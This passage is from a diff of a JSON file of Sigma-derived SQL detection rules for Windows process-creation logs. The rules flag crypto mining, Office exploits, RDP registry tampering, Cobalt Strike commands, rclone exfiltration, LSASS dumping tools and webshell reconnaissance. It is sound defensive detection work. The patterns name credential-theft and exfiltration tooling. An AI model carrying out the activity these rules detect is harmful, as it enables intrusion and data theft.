LIKE '%c3RyYXR1bSt1ZHA6Ly%' ESCAPE '\\' OR CommandLine LIKE '%N0cmF0dW0rdWRwOi8v%' ESCAPE '\\' OR CommandLine LIKE '%zdHJhdHVtK3VkcDovL%' ESCAPE '\\') AND NOT ((CommandLine LIKE '% pool.c %' ESCAPE '\\' OR CommandLine LIKE '% pool.o %' ESCAPE '\\' OR CommandLine LIKE '%gcc -%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_reg_defender_exclusion.yml" + "filename": "proc_creation_win_susp_crypto_mining_monero.yml" }, { - "title": "Griffon Malware Attack Pattern", - "id": "bcc6f179-11cd-4111-a9a6-0fab68515cf7", - "status": "experimental", - "description": "Detects process execution patterns related to Griffon malware as reported by Kaspersky", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Exploit for CVE-2017-8759", + "id": "fdd84c68-a1f6-47c9-9477-920584f94905", + "status": "test", + "description": "Detects Winword starting uncommon sub process csc.exe as used in exploits for CVE-2017-8759", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%\\\\local\\\\temp\\\\%' ESCAPE '\\' AND CommandLine LIKE '%//b /e:jscript%' ESCAPE '\\' AND CommandLine LIKE '%.txt%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\WINWORD.EXE' ESCAPE '\\' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_malware_griffon_patterns.yml" + "filename": "proc_creation_win_exploit_cve_2017_8759.yml" }, { - "title": "Potential Tampering With RDP Related Registry Keys Via Reg.EXE", - "id": "0d5675be-bc88-4172-86d3-1e96a4476536", - "status": "experimental", - "description": "Detects the execution of \"reg.exe\" for enabling/disabling the RDP service on the host 
by tampering with the 'CurrentControlSet\\Control\\Terminal Server' values", - "author": "pH-T (Nextron Systems), @Kostastsale, @TheDFIRReport", + "title": "WSF/JSE/JS/VBA/VBE File Execution", + "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "status": "test", + "description": "Detects suspicious file execution by wscript and cscript", + "author": "Michael Haag", "tags": [ - "attack.defense_evasion", - "attack.lateral_movement", - "attack.t1021.001", - "attack.t1112" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "falsepositives": [ - "Unknown" + "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\reg.exe' ESCAPE '\\' OR OriginalFileName = 'reg.exe') AND (CommandLine LIKE '% add %' ESCAPE '\\' AND CommandLine LIKE '%\\\\CurrentControlSet\\\\Control\\\\Terminal Server%' ESCAPE '\\' AND CommandLine LIKE '%REG\\_DWORD%' ESCAPE '\\' AND CommandLine LIKE '% /f%' ESCAPE '\\')) AND ((CommandLine LIKE '%Licensing Core%' ESCAPE '\\' AND CommandLine LIKE '%EnableConcurrentSessions%' ESCAPE '\\') OR (CommandLine LIKE '%WinStations\\\\RDP-Tcp%' ESCAPE '\\' OR CommandLine LIKE '%MaxInstanceCount%' ESCAPE '\\' OR CommandLine LIKE '%fEnableWinStation%' ESCAPE '\\' OR CommandLine LIKE '%TSUserEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSEnabled%' ESCAPE '\\' OR CommandLine LIKE '%TSAppCompat%' ESCAPE '\\' OR CommandLine LIKE '%IdleWinStationPoolCount%' ESCAPE '\\' OR CommandLine LIKE '%TSAdvertise%' ESCAPE '\\' OR CommandLine LIKE '%AllowTSConnections%' ESCAPE '\\' OR CommandLine LIKE '%fSingleSessionPerUser%' ESCAPE '\\' OR CommandLine LIKE '%fDenyTSConnections%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (NewProcessName LIKE '%\\\\wscript.exe' 
ESCAPE '\\' OR NewProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_rdp_keys_tamper.yml" + "filename": "proc_creation_win_script_execution.yml" }, { - "title": "Custom Class Execution via Xwizard", - "id": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "title": "Tap Installer Execution", + "id": "99793437-3e16-439b-be0f-078782cf953d", "status": "test", - "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", - "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", + "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.exfiltration", + "attack.t1048" ], "falsepositives": [ - "Unknown" + "Legitimate OpenVPN TAP insntallation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND CommandLine REGEXP '\\{[a-fA-F0-9]{8}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{4}-[a-fA-F0-9]{12}\\}')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\tapinstall.exe' ESCAPE '\\' AND NOT (((NewProcessName LIKE 'C:\\\\Program Files\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Avast Software\\\\SecureLine VPN\\\\tapinstall.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\OpenVPN Connect\\\\drivers\\\\tap\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\Proton Technologies\\\\ProtonVPNTap\\\\installer\\\\%' ESCAPE 
'\\')))" ], - "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml" + "filename": "proc_creation_win_tapinstall_execution.yml" }, { - "title": "Gzip Archive Decode Via PowerShell", - "id": "98767d61-b2e8-4d71-b661-e36783ee24c1", + "title": "Renamed Remote Utilities RAT (RURAT) Execution", + "id": "9ef27c24-4903-4192-881a-3adde7ff92a5", "status": "experimental", - "description": "Detects attempts of decoding encoded Gzip archives via PowerShell.", - "author": "Hieu Tran", + "description": "Detects execution of renamed Remote Utilities (RURAT) via Product PE header field", + "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.collection", + "attack.command_and_control", + "attack.discovery", + "attack.s0592" + ], "falsepositives": [ - "Legitimate administrative scripts may use this functionality. Use \"ParentImage\" in combination with the script names and allowed users and applications to filter legitimate executions" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%GZipStream%' ESCAPE '\\' AND CommandLine LIKE '%::Decompress%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Product = 'Remote Utilities' AND NOT ((NewProcessName LIKE '%\\\\rutserv.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rfusclient.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_decode_gzip.yml" + "filename": "proc_creation_win_renamed_rurat.yml" }, { - "title": "Suspicious Parent of Csc.exe", - "id": "b730a276-6b63-41b8-bcf8-55930c8fc6ee", - "status": "test", - "description": "Detects a suspicious parent of csc.exe, which could by a sign of payload delivery", - "author": "Florian Roth (Nextron Systems)", + "title": "Import PowerShell Modules From Suspicious Directories - ProcCreation", + "id": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", + "status": "experimental", + "description": "Detects 
powershell scripts that import modules from suspicious directories", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.execution", - "attack.t1059.005", - "attack.t1059.007", - "attack.defense_evasion", - "attack.t1218.005", - "attack.t1027.004" + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\csc.exe' ESCAPE '\\' AND (ParentProcessName LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\mshta.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%Import-Module \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%Import-Module C:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo \"$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo ''$Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo $Env:Appdata\\\\%' ESCAPE '\\' OR CommandLine LIKE '%ipmo C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_csc_susp_parent.yml" + "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml" }, { - "title": "HackTool - CreateMiniDump Execution", - "id": "36d88494-1d43-4dc0-b3fa-35c8fea0ca9d", + "title": "PowerShell Get-Clipboard Cmdlet Via CLI", + "id": "b9aeac14-2ffd-4ad3-b967-1354a4e628c3", "status": "test", - 
"description": "Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects usage of the 'Get-Clipboard' cmdlet via CLI", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.001" + "attack.collection", + "attack.t1115" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\CreateMiniDump.exe' ESCAPE '\\' OR Imphash = '4a07f944a83e8a7c2525efa35dd30e2f' OR Hashes LIKE '%IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Get-Clipboard%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_createminidump.yml" + "filename": "proc_creation_win_powershell_get_clipboard.yml" }, { - "title": "LOLBIN Execution Of The FTP.EXE Binary", - "id": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "title": "Interactive AT Job", + "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", "status": "test", - "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", - "author": "Victor Sergeev, oscd.community", + "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", + "author": "E.M. 
Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.execution", - "attack.t1059", - "attack.defense_evasion", - "attack.t1202" + "attack.privilege_escalation", + "attack.t1053.002" ], "falsepositives": [ - "Unknown" + "Unlikely (at.exe deprecated as of Windows 8)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (ParentProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR ((NewProcessName LIKE '%\\\\ftp.exe' ESCAPE '\\' OR OriginalFileName = 'ftp.exe') AND CommandLine LIKE '%-s:%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" ], - "filename": "proc_creation_win_lolbin_ftp.yml" + "filename": "proc_creation_win_at_interactive_execution.yml" }, { - "title": "Suspicious GrpConv Execution", - "id": "f14e169e-9978-4c69-acb3-1cff8200bc36", + "title": "Operator Bloopers Cobalt Strike Modules", + "id": "4f154fb6-27d1-4813-a759-78b93e0b9c48", "status": "experimental", - "description": "Detects the suspicious execution of a utility to convert Windows 3.x .grp files or for persistence purposes by malicious software or actors", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "author": "_pete_0, TheDFIRReport", "tags": [ - "attack.persistence", - "attack.t1547" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%grpconv.exe -o%' ESCAPE '\\' OR CommandLine LIKE '%grpconv -o%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (OriginalFileName = 'Cmd.Exe' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') AND (CommandLine LIKE '%Invoke-UserHunter%' 
ESCAPE '\\' OR CommandLine LIKE '%Invoke-ShareFinder%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Kerberoast%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-SMBAutoBrute%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Nightmare%' ESCAPE '\\' OR CommandLine LIKE '%zerologon%' ESCAPE '\\' OR CommandLine LIKE '%av\\_query%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_susp_grpconv.yml" + "filename": "proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml" }, { - "title": "UAC Bypass Using IDiagnostic Profile", - "id": "4cbef972-f347-4170-b62a-8253f6168e6d", + "title": "Potential System Information Discovery Via Wmic.EXE", + "id": "9d5a1274-922a-49d0-87f3-8c653483b909", "status": "experimental", - "description": "Detects the \"IDiagnosticProfileUAC\" UAC bypass technique", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", + "author": "TropChaud", "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002" + "attack.discovery", + "attack.t1082" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\DllHost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '% /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}%' ESCAPE '\\' AND IntegrityLevel IN ('High', 'System'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR NewProcessName LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE 
'%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_uac_bypass_idiagnostic_profile.yml" + "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" }, { - "title": "Webshell Detection With Command Line Keywords", - "id": "bed2a484-9348-4143-8a8a-b801c979301c", - "status": "experimental", - "description": "Detects certain command line parameters often used during reconnaissance activity via web shells", - "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, Anton Kutepov, oscd.community", + "title": "PUA - Nmap/Zenmap Execution", + "id": "f6ecd1cf-19b8-4488-97f6-00f0924991a3", + "status": "test", + "description": "Detects usage of namp/zenmap. 
Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1505.003", - "attack.t1018", - "attack.t1033", - "attack.t1087" + "attack.discovery", + "attack.t1046" ], "falsepositives": [ - "Unknown" + "Network administrator computer" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\w3wp.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\php-cgi.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\nginx.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\httpd.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\caddy.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\ws\\_tomcatservice.exe' ESCAPE '\\') OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (ParentProcessName LIKE '%-tomcat-%' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\tomcat%' ESCAPE '\\')) OR ((ParentProcessName LIKE '%\\\\java.exe' ESCAPE '\\' OR ParentProcessName LIKE '%\\\\javaw.exe' ESCAPE '\\') AND (CommandLine LIKE '%catalina.jar%' ESCAPE '\\' OR CommandLine LIKE '%CATALINA\\_HOME%' ESCAPE '\\'))) AND ((OriginalFileName IN ('net.exe', 'net1.exe') AND (CommandLine LIKE '% user %' ESCAPE '\\' OR CommandLine LIKE '% use %' ESCAPE '\\' OR CommandLine LIKE '% group %' ESCAPE '\\')) OR (OriginalFileName = 'ping.exe' AND CommandLine LIKE '% -n %' ESCAPE '\\') OR (CommandLine LIKE '%&cd&echo%' ESCAPE '\\' OR CommandLine LIKE '%cd /d %' ESCAPE '\\') OR (OriginalFileName = 'wmic.exe' AND CommandLine LIKE '% /node:%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\quser.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pathping.exe' ESCAPE '\\' OR 
NewProcessName LIKE '%\\\\tracert.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssadmin.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tasklist.exe' ESCAPE '\\') OR OriginalFileName IN ('whoami.exe', 'sysinfo.exe', 'quser.exe', 'ipconfig.exe', 'pathping.exe', 'tracert.exe', 'netstat.exe', 'schtasks.exe', 'VSSADMIN.EXE', 'wevtutil.exe', 'tasklist.exe')) OR (CommandLine LIKE '% Test-NetConnection %' ESCAPE '\\' OR CommandLine LIKE '%dir \\\\%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\nmap.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\zennmap.exe' ESCAPE '\\') OR OriginalFileName IN ('nmap.exe', 'zennmap.exe')))" ], - "filename": "proc_creation_win_webshell_detection.yml" + "filename": "proc_creation_win_pua_nmap_zenmap.yml" }, { "title": "HackTool - GMER Rootkit Detector and Remover Execution", 
@@ -24633,1656 +24673,1693 @@ "filename": "proc_creation_win_hktl_gmer.yml" }, { - "title": "PowerShell Base64 Encoded WMI Classes", - "id": "1816994b-42e1-4fb1-afd2-134d88184f71", + "title": "PUA - Rclone Execution", + "id": "e37db05d-d1f9-49c8-b464-cee1a4b11638", "status": "experimental", - "description": "Detects calls to base64 encoded WMI class such as \"Win32_Shadowcopy\", \"\"...etc.", - "author": "Christian Burkard (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND ((CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2hhZG93Y29we%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NoYWRvd2NvcH%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TaGFkb3djb3B5%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfU2NoZWR1bGVkSm9i%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1NjaGVkdWxlZEpvY%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9TY2hlZHVsZWRKb2%' ESCAPE 
'\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfUHJvY2Vzc%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1Byb2Nlc3%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Qcm9jZXNz%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfVXNlckFjY291bn%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX1VzZXJBY2NvdW50%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Vc2VyQWNjb3Vud%' ESCAPE '\\') OR (CommandLine LIKE '%VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA%' ESCAPE '\\' OR CommandLine LIKE '%cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA%' ESCAPE '\\' OR CommandLine LIKE '%XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg%' ESCAPE '\\' OR CommandLine LIKE '%V2luMzJfTG9nZ2VkT25Vc2Vy%' ESCAPE '\\' OR CommandLine LIKE '%dpbjMyX0xvZ2dlZE9uVXNlc%' ESCAPE '\\' OR CommandLine LIKE '%XaW4zMl9Mb2dnZWRPblVzZX%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%--config %' ESCAPE '\\' AND CommandLine LIKE '%--no-check-certificate %' ESCAPE '\\' AND CommandLine LIKE '% copy %' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\rclone.exe' ESCAPE '\\' OR Description = 'Rsync for cloud storage') AND (CommandLine LIKE '%pass%' ESCAPE '\\' OR CommandLine LIKE '%user%' ESCAPE '\\' OR CommandLine LIKE '%copy%' ESCAPE '\\' OR CommandLine LIKE '%sync%' ESCAPE '\\' OR CommandLine LIKE '%config%' ESCAPE '\\' OR CommandLine LIKE '%lsd%' ESCAPE '\\' OR CommandLine LIKE '%remote%' ESCAPE '\\' OR CommandLine LIKE '%ls%' ESCAPE '\\' OR CommandLine LIKE '%mega%' ESCAPE '\\' OR CommandLine LIKE '%pcloud%' ESCAPE '\\' OR 
CommandLine LIKE '%ftp%' ESCAPE '\\' OR CommandLine LIKE '%ignore-existing%' ESCAPE '\\' OR CommandLine LIKE '%auto-confirm%' ESCAPE '\\' OR CommandLine LIKE '%transfers%' ESCAPE '\\' OR CommandLine LIKE '%multi-thread-streams%' ESCAPE '\\' OR CommandLine LIKE '%no-check-certificate %' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_powershell_base64_wmi_classes.yml" + "filename": "proc_creation_win_pua_rclone_execution.yml" }, { - "title": "Sysmon Discovery Via Default Driver Altitude Using Findstr.EXE", - "id": "37db85d1-b089-490a-a59a-c7b6f984f480", - "status": "test", - "description": "Detects usage of \"findstr\" with the argument \"385201\". Which could indicate potential discovery of an installed Sysinternals Sysmon service using the default driver altitude (even if the name is changed).", - "author": "frack113", + "title": "Gpg4Win Decrypt Files From Suspicious Locations", + "id": "e1e0b7d7-e10b-4ee4-ac49-a4bda05d320d", + "status": "experimental", + "description": "Detects usage of the Gpg4win to decrypt files located in suspicious locations from CLI", + "author": "Nasreddine Bencherchali (Nextron Systems), X__Junior (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1518.001" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\findstr.exe' ESCAPE '\\' OR OriginalFileName = 'FINDSTR.EXE') AND CommandLine LIKE '% 385201%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\gpg2.exe' ESCAPE '\\' OR Product = 'GNU Privacy Guard (GnuPG)' OR Company = 'g10 Code GmbH') AND CommandLine LIKE '%-passphrase%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Roaming\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE 
'%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\temp%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml" + "filename": "proc_creation_win_gpg4win_susp_usage.yml" }, { - "title": "Potential Recon Activity Via Nltest.EXE", - "id": "5cc90652-4cbd-4241-aa3b-4b462fa5a248", + "title": "Procdump Execution", + "id": "2e65275c-8288-4ab4-aeb7-6274f58b6b20", "status": "experimental", - "description": "Detects nltest commands that can be used for information discovery", - "author": "Craig Young, oscd.community, Georg Lauenstein", + "description": "Detects usage of the SysInternals Procdump utility", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.discovery", - "attack.t1016", - "attack.t1482" + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" ], "falsepositives": [ - "Legitimate administration use but user and host must be investigated" + "Legitimate use of procdump by a developer or administrator" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\nltest.exe' ESCAPE '\\' OR OriginalFileName = 'nltestrk.exe') AND ((CommandLine LIKE '%/server%' ESCAPE '\\' AND CommandLine LIKE '%/query%' ESCAPE '\\') OR (CommandLine LIKE 